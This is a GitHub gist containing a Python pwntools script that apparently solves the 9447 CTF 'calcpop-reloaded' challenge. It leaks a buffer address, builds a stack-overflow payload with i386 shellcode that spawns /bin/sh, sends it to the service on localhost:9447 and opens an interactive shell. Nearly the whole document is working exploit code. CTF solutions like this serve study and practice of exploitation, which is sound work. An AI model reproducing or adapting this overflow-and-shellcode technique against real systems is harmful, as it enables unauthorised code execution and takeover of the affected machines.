Skip to content

Instantly share code, notes, and snippets.

@cubarco cubarco/9447-calcpop-reloaded.py
Created Dec 4, 2015

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
9447-calcpop-reloaded.py
#!/usr/bin/env python
# coding=utf8
from pwn import p32, remote, context, asm, shellcraft
import sys
context.arch = 'i386'
p = remote('localhost', 9447)
p.recvuntil('Welcome to calc.exe\n')
p.sendline('get_buf_addr')
buf_addr = int(p.recvline().split()[-1], 16)
ecx_set = buf_addr + 0x98 - 16 - 4 + 4
shellcode_addr = buf_addr + 0x98 - 16 - 4 + 4*2 + 0x20
shellcode_str = (
'''
{}
mov edi, esp
{}
push edi
push edi
push 0xdeadbeef /* junk */
mov ebx, {}
xor ebx, 0x12121212
call ebx
'''.format(shellcraft.i386.pushstr('/bin/sh'),
shellcraft.i386.push(1),
0x10011a ^ 0x12121212) # spawn(%x, %x, %d)
)
print shellcode_str
shellcode = asm(shellcode_str)
payload = 'A' * (0x98 - 16 - 4) + \
p32(shellcode_addr) + \
p32(ecx_set) + 'A' * 0x20 + \
shellcode
if '\n' in payload or '\x00' in payload:
print 'newline or zero byte found in payload'
sys.exit(1)
p.sendline(payload)
p.sendline("201527 0")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.